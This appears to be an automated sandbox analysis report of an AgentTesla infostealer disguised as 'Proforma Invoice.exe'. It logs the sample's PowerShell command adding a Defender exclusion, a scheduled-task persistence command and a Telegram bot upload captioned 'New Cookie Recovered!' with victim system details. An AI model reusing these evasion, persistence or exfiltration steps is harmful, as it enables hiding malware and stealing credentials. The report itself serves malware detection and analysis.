                                                                                                  2022-07-18 08:25:19 UTC3OUTData Raw: 6a a0 f3 72 71 24 12 b3 9d 31 b4 dd dd ec b2 ef 68 8d c7 6c b3 64 e9 4c b5 f5 11 96 5f a1 66 47 6c 50 e9 db 39 28 d3 e8 a5 09 8b 51 77 8e 62 d4 9d 82 96 96 56 af 2f 94 0c 0b c4 28 ec 63 fb ed fb 73 4e b3 aa 56 e2 e6 42 5a ad 2e 05 35 5e 7d a8 1b 16 ea 43 c1 a0 30 de be b0 8a f2 8c 6b 6e f4 fc 61 fd b8 39 51 77 65 a4 06 94 de bb 93 e9 ae ed c9 9a 8e 55 bb 73 67 ba af 3f 99 de 4d ef 90 77 c7 e8 c5 61 a8 a9 de 12 f1 f8 42 89 e0 72 dd 72 5b 50 e3 ee d5 dd db 37 b8 eb 3b e0 44 51 3a 46 a4 1f a5 af 9c 1b 00 00 00 00 00 00 00 fc 2b 5d 2f 8a 89 c6 85 f3 1a dd cc 17 35 6e ec cd 31 b5 ec 1e ba 98 85 f8 8d d7 78 c4 70 e3 e5 d4 5a 41 6c 6e cc e7 b5 a2 6a 73 8d 97 ec d6 f8 2a e2 ee ff a7 88 34 25 fd 22 9d f9 a7 ff 0b 00 00 00 00 00 00 00 ac 28 2c 26 84 65 4e 01 c4 d5
                                                                                                  Data Ascii: jrq$1hldL_fGlP9(QwbV/(csNVBZ.5^}C0kna9QweUsg?MwaBrr[P7;DQ:F+]/5n1xpZAlnjs*4%"(,&eN
                                                                                                  2022-07-18 08:25:19 UTC4INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0
                                                                                                  Date: Mon, 18 Jul 2022 08:25:19 GMT
                                                                                                  Content-Type: application/json
                                                                                                  Content-Length: 648
                                                                                                  Connection: close
                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                  {"ok":true,"result":{"message_id":525,"from":{"id":5573921253,"is_bot":true,"first_name":"Johnero","username":"Johnerobot"},"chat":{"id":5359531870,"first_name":"Reuben","last_name":"Eric","username":"Wirewire101","type":"private"},"date":1658132719,"document":{"file_name":"user-287400 2022-07-18 11-05-53.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAICDWLVGO8D0eEMY6XVwdN3u79eJVKRAAKWCwACpVaoUh-zNYjMnZtrKQQ","file_unique_id":"AgADlgsAAqVWqFI","file_size":1315},"caption":"New Cookie Recovered!\n\nUser Name: user/287400\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:10:24:31
                                                                                                  Start date:18/07/2022
                                                                                                  Path:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\Proforma Invoice.exe"
                                                                                                  Imagebase:0x4c0000
                                                                                                  File size:901120 bytes
                                                                                                  MD5 hash:BEA52E8910C076F5720AC20970E48A10
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.421261359.0000000004564000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.421261359.0000000004564000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low

                                                                                                  General

                                                                                                  Target ID:4
                                                                                                  Start time:10:24:43
                                                                                                  Start date:18/07/2022
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe
                                                                                                  Imagebase:0xf10000
                                                                                                  File size:430592 bytes
                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Target ID:5
                                                                                                  Start time:10:24:43
                                                                                                  Start date:18/07/2022
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6406f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Target ID:6
                                                                                                  Start time:10:24:44
                                                                                                  Start date:18/07/2022
                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ebJpPhiwjcAviB" /XML "C:\Users\user\AppData\Local\Temp\tmp8D30.tmp
                                                                                                  Imagebase:0xce0000
                                                                                                  File size:185856 bytes
                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Target ID:7
                                                                                                  Start time:10:24:45
                                                                                                  Start date:18/07/2022
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6406f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Target ID:8
                                                                                                  Start time:10:24:48
                                                                                                  Start date:18/07/2022
                                                                                                  Path:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                  Imagebase:0xbd0000
                                                                                                  File size:901120 bytes
                                                                                                  MD5 hash:BEA52E8910C076F5720AC20970E48A10
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.636659642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.636659642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.412155830.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.412155830.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.412961855.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.412961855.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.410130498.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.410130498.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:6.6%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:76
                                                                                                    Total number of Limit Nodes:5
                                                                                                    execution_graph 20306 f5d3b0 GetCurrentProcess 20307 f5d423 20306->20307 20308 f5d42a GetCurrentThread 20306->20308 20307->20308 20309 f5d467 GetCurrentProcess 20308->20309 20310 f5d460 20308->20310 20311 f5d49d GetCurrentThreadId 20309->20311 20310->20309 20313 f5d4f6 20311->20313 20314 f5b590 20315 f5b5d2 20314->20315 20316 f5b5d8 GetModuleHandleW 20314->20316 20315->20316 20317 f5b605 20316->20317 20318 f540e8 20319 f54105 20318->20319 20320 f54112 20319->20320 20328 f54248 20319->20328 20324 f5387c 20320->20324 20322 f5415b 20325 f53887 20324->20325 20333 f5800c 20325->20333 20327 f58385 20327->20322 20329 f5424c 20328->20329 20391 f54339 20329->20391 20395 f54348 20329->20395 20334 f58017 20333->20334 20337 f5808c 20334->20337 20336 f587d5 20336->20327 20338 f58097 20337->20338 20341 f580bc 20338->20341 20340 f588ba 20340->20336 20342 f580c7 20341->20342 20345 f580ec 20342->20345 20344 f589aa 20344->20340 20346 f580f7 20345->20346 20348 f590be 20346->20348 20352 f5aeb0 20346->20352 20355 f5aeaf 20346->20355 20347 f590fc 20347->20344 20348->20347 20358 f5cfd0 20348->20358 20362 f5af98 20352->20362 20353 f5aebf 20353->20348 20356 f5aebf 20355->20356 20357 f5af98 LoadLibraryExW 20355->20357 20356->20348 20357->20356 20360 f5cfd4 20358->20360 20359 f5d025 20359->20347 20360->20359 20379 f5d298 20360->20379 20363 f5af9c 20362->20363 20364 f5afcb 20363->20364 20367 f5b638 20363->20367 20371 f5b628 20363->20371 20364->20353 20368 f5b64c 20367->20368 20370 f5b671 20368->20370 20375 f5b198 20368->20375 20370->20364 20372 f5b638 20371->20372 20373 f5b198 LoadLibraryExW 20372->20373 20374 f5b671 20372->20374 20373->20374 20374->20364 20376 f5b818 LoadLibraryExW 20375->20376 20378 f5b891 20376->20378 20378->20370 20381 f5d2a5 20379->20381 20380 f5d2df 20380->20359 20381->20380 20383 f5b498 20381->20383 20384 f5b4a3 20383->20384 20385 f5dfd8 20384->20385 20387 f5b560 20384->20387 20388 f5b56b 20387->20388 20389 f580ec LoadLibraryExW 20388->20389 20390 f5e047 20389->20390 20390->20385 20392 f5433c 20391->20392 20393 f5444c 20392->20393 20399 f53e74 20392->20399 20397 f5436f 20395->20397 20396 f5444c 20396->20396 20397->20396 20398 f53e74 CreateActCtxA 20397->20398 20398->20396 20400 f553d8 CreateActCtxA 20399->20400 20402 f5549b 20400->20402 20403 f5d5d8 DuplicateHandle 20404 f5d66e 20403->20404

                                                                                                    Executed Functions

                                                                                                    Function 00F5DE44 Relevance: .3, Instructions: 265COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ae5542526c095f86640457489de1f11006b938df6cc702bc4aea8541df4421c0
                                                                                                    • Instruction ID: f59fcdadaaa42acf29d5a83360d7e046f2c91a7650a809e562b87d64d2209977
                                                                                                    • Opcode Fuzzy Hash: ae5542526c095f86640457489de1f11006b938df6cc702bc4aea8541df4421c0
                                                                                                    • Instruction Fuzzy Hash: F9A17032E006198FCF15DFA5C8445DEB7F2FF89301B1585BAEA05BB221EB35A949DB40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00F5D3B0 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00F5D410
                                                                                                    • GetCurrentThread.KERNEL32 ref: 00F5D44D
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00F5D48A
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00F5D4E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Current$ProcessThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2063062207-0
                                                                                                    • Opcode ID: bcc687e30b5d05b0676158959129ebca3f6ed04b8b7caedcb1d595b3d27dc421
                                                                                                    • Instruction ID: d6d5d2fabb245db2a107adff1163a954059bf7cfba0fd1ed3b113fb90139ae49
                                                                                                    • Opcode Fuzzy Hash: bcc687e30b5d05b0676158959129ebca3f6ed04b8b7caedcb1d595b3d27dc421
                                                                                                    • Instruction Fuzzy Hash: 0E5153B0D052498FDB64CFA9D548B9EBBF0FF48314F248469E519A7350D774A848CB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00F553CD Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 150 f553cd-f553ce 151 f553d0-f553d1 150->151 152 f553d2 150->152 151->152 153 f553d4-f553d5 152->153 154 f553d6 152->154 153->154 155 f553d8-f553d9 154->155 156 f553da-f55499 CreateActCtxA 154->156 155->156 158 f554a2-f554fc 156->158 159 f5549b-f554a1 156->159 166 f554fe-f55501 158->166 167 f5550b-f5550f 158->167 159->158 166->167 168 f55511-f5551d 167->168 169 f55520 167->169 168->169 171 f55521 169->171 171->171
                                                                                                    APIs
                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00F55489
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Create
                                                                                                    • String ID:
                                                                                                    • API String ID: 2289755597-0
                                                                                                    • Opcode ID: 73a71be957074eeda89acd408513a9e549a6cd577641095429010459867a4b02
                                                                                                    • Instruction ID: 0ae682e5a5cdefd966f9bc76fb753dbc3ea89eab920ba589306fa35f8d1ad685
                                                                                                    • Opcode Fuzzy Hash: 73a71be957074eeda89acd408513a9e549a6cd577641095429010459867a4b02
                                                                                                    • Instruction Fuzzy Hash: 0B415671C04718CFDB20CF99C9547CEBBB1BF48308F24802AD518AB251DBB1994ACF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00F53E74 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 172 f53e74-f55499 CreateActCtxA 176 f554a2-f554fc 172->176 177 f5549b-f554a1 172->177 184 f554fe-f55501 176->184 185 f5550b-f5550f 176->185 177->176 184->185 186 f55511-f5551d 185->186 187 f55520 185->187 186->187 189 f55521 187->189 189->189
                                                                                                    APIs
                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00F55489
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Create
                                                                                                    • String ID:
                                                                                                    • API String ID: 2289755597-0
                                                                                                    • Opcode ID: 75b67daf5f05715f9d25fd2d8e4e7dd522c25c04d64f5ce37560c644c2939793
                                                                                                    • Instruction ID: b4b9a1ee0eaa66b82d69ac396f85fb526667d2be95a16f5f0660621f3965558b
                                                                                                    • Opcode Fuzzy Hash: 75b67daf5f05715f9d25fd2d8e4e7dd522c25c04d64f5ce37560c644c2939793
                                                                                                    • Instruction Fuzzy Hash: 8B410471C0471CCFDB24CFA9C85478EBBB5BF48308F24806AD519AB251DB75698ACF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00F5D5D8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 190 f5d5d8-f5d66c DuplicateHandle 191 f5d675-f5d692 190->191 192 f5d66e-f5d674 190->192 192->191
                                                                                                    APIs
                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F5D65F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DuplicateHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 3793708945-0
                                                                                                    • Opcode ID: 0a6e46242a36ea8dda7d875a0d85a9a34b06f352ae87fbcdc8c28f66609613f0
                                                                                                    • Instruction ID: 9e982bbc221864d882da5a9523a22d8c66df4fb1d8d2ce2ab82d057f17509851
                                                                                                    • Opcode Fuzzy Hash: 0a6e46242a36ea8dda7d875a0d85a9a34b06f352ae87fbcdc8c28f66609613f0
                                                                                                    • Instruction Fuzzy Hash: 2C21D5B5D01209AFDB10CFA9D484ADEBBF4FB48324F14841AE954A7310D374A955CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00F5B810 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 195 f5b810-f5b812 196 f5b814 195->196 197 f5b816-f5b858 195->197 196->197 199 f5b860-f5b88f LoadLibraryExW 197->199 200 f5b85a-f5b85d 197->200 201 f5b891-f5b897 199->201 202 f5b898-f5b8b5 199->202 200->199 201->202
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F5B671,00000800,00000000,00000000), ref: 00F5B882
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: 7c6a963963e64c93e246d7d11aba6ba515ec9bd00ee5a1595ed686374b5438c8
                                                                                                    • Instruction ID: ab9b0fe9cdc1f1ca028b72f66f4a02705a38f6b9415c373065bf9f4a24c4573c
                                                                                                    • Opcode Fuzzy Hash: 7c6a963963e64c93e246d7d11aba6ba515ec9bd00ee5a1595ed686374b5438c8
                                                                                                    • Instruction Fuzzy Hash: C62127B2C003498FDB10CFA9C884BDEFBF4AB59325F14846AD955A7201C3749946CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00F5B198 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 205 f5b198-f5b858 208 f5b860-f5b88f LoadLibraryExW 205->208 209 f5b85a-f5b85d 205->209 210 f5b891-f5b897 208->210 211 f5b898-f5b8b5 208->211 209->208 210->211
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F5B671,00000800,00000000,00000000), ref: 00F5B882
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: a8ef19fb343258e650f8378912e924f6fd72c766142eb73b7d3cc8135d4e4126
                                                                                                    • Instruction ID: 095da7ae8b55a47fc972c75529b550aa64da14d4da8e7183fa0c0e48c53c76f6
                                                                                                    • Opcode Fuzzy Hash: a8ef19fb343258e650f8378912e924f6fd72c766142eb73b7d3cc8135d4e4126
                                                                                                    • Instruction Fuzzy Hash: FA1117B2D003099FDB10CF9AC444BDEFBF9EB58325F15842AE915A7200C374A949CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00F5B58B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 214 f5b58b-f5b5d0 215 f5b5d2-f5b5d5 214->215 216 f5b5d8-f5b603 GetModuleHandleW 214->216 215->216 217 f5b605-f5b60b 216->217 218 f5b60c-f5b620 216->218 217->218
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00F5B5F6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 4139908857-0
                                                                                                    • Opcode ID: e6116a514721a19c0ae2e89d40316cab47046f303688297071f47a7dba3d246a
                                                                                                    • Instruction ID: faf4fbc7d3c6afc97a134bf9f2b015749914803c90cbb640d57d2e8022550d20
                                                                                                    • Opcode Fuzzy Hash: e6116a514721a19c0ae2e89d40316cab47046f303688297071f47a7dba3d246a
                                                                                                    • Instruction Fuzzy Hash: 541132B2C006498FCB20CFAAC844BDEFBF4AF89324F04805AD868A7201D374A545CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00F5B8B8 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 221 f5b8b8-f5b8ba 222 f5b8bc 221->222 223 f5b8be-f5b8c2 221->223 222->223 224 f5b8c4 223->224 225 f5b8c6-f5b8d5 223->225 224->225 226 f5b856-f5b858 224->226 227 f5b8d7-f5b8db 225->227 228 f5b8dc-f5b8e8 225->228 229 f5b860-f5b88f LoadLibraryExW 226->229 230 f5b85a-f5b85d 226->230 234 f5b8f2-f5b907 call f59f3c 228->234 235 f5b8ea-f5b8f1 228->235 232 f5b891-f5b897 229->232 233 f5b898-f5b8b5 229->233 230->229 232->233
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4da0007aa5315c0a88a44aa6f1cedfb1ce64a0c4ed2311f4f29f2b8a3a2933b6
                                                                                                    • Instruction ID: 455e058ef091f3b9404afb4566b7654deb7d0ac9b450f819d1c3b98e62114d45
                                                                                                    • Opcode Fuzzy Hash: 4da0007aa5315c0a88a44aa6f1cedfb1ce64a0c4ed2311f4f29f2b8a3a2933b6
                                                                                                    • Instruction Fuzzy Hash: A411ADB2D043048FDB208BA9D4043EABBB4EF95326F05849ADA09AB211C375981ADB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00F5B590 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 241 f5b590-f5b5d0 242 f5b5d2-f5b5d5 241->242 243 f5b5d8-f5b603 GetModuleHandleW 241->243 242->243 244 f5b605-f5b60b 243->244 245 f5b60c-f5b620 243->245 244->245
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00F5B5F6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 4139908857-0
                                                                                                    • Opcode ID: 195cae4f62b4de2e4d3414e51056e6c274c4006cf404dccb7eeea183a0bcce1c
                                                                                                    • Instruction ID: 131b914cbd8d863978d1414db31abd8ab2dd07fc100a7e231f516650b762ec01
                                                                                                    • Opcode Fuzzy Hash: 195cae4f62b4de2e4d3414e51056e6c274c4006cf404dccb7eeea183a0bcce1c
                                                                                                    • Instruction Fuzzy Hash: C91110B2C003498FCB20CF9AC444BDEFBF4AB88324F14841AD829B7200D374A549CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00E6D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415605869.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e6d000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ac29fe3f66caa2bd6a0ac2d209909f483072bf286b7bd2aeff9ece081a4f60ec
                                                                                                    • Instruction ID: a2616f8b40d5b9a15d873d233b26990b621919406f7d1f2e49c528958b72ad1e
                                                                                                    • Opcode Fuzzy Hash: ac29fe3f66caa2bd6a0ac2d209909f483072bf286b7bd2aeff9ece081a4f60ec
                                                                                                    • Instruction Fuzzy Hash: 7D214871A48240DFCB01DF10EDC0B26BF61FB8836CF24C569E8065B606C336D856C7A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

